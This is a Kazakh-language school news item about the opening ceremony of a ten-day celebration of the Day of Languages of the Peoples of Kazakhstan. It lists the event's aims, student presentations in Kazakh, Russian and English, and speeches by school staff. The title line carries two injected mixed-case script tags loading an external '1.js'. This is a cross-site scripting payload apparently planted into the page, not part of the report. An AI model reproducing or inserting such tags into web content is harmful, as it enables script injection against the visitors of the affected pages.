Қазақстан халықтарының Тілдері күні онкүндігінің ашылу салтанаты жайлы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.09.2021

   Мектебімізде Қазақстан халықтарының Тілдері күні онкүндігінің жоспары құрылып, жоспарға сәйкес  06 қыркүйек 2021 жылы онкүндіктің ашылуына байланысты салтанатты жиын өтті.

Онкүндіктің мақсаты:

  • - көпұлтты елдің тұтастығын сақтау;
  • қазақ тілін дамыту және тарату;
  • жас ұрпақтың бойында өз халқының да, елде тұратын басқа ұлттардың да мәдениеті мен дәстүрлеріне құрметпен қарауды қалыптастыру.

   Жиында оқушылар қатысушыларды қазақ, орыс , ағылшын тілдерінде  Қазақстан халықтарының Тілдері күні мерекесі және оның маңыздылығы  жайлы ақпараттармен таныстырды, мектеп директоры Мамчур М.М.  мерекемен құттықтап, үш тілді меңгерудің маңыздылығы туралы баса айтып өтті. Одан әрі әдістемелік бірлестік жетекшісі Решетникова Л.А онкүндіктің жоспарымен таныстырып, оқушыларды белсене атсалысуға шақырды.

Жиын соңында оқушылар үш тілде өлең оқыды.

Просмотров: 591


Пікір қосу



Деректерді қолтаңбаға қосу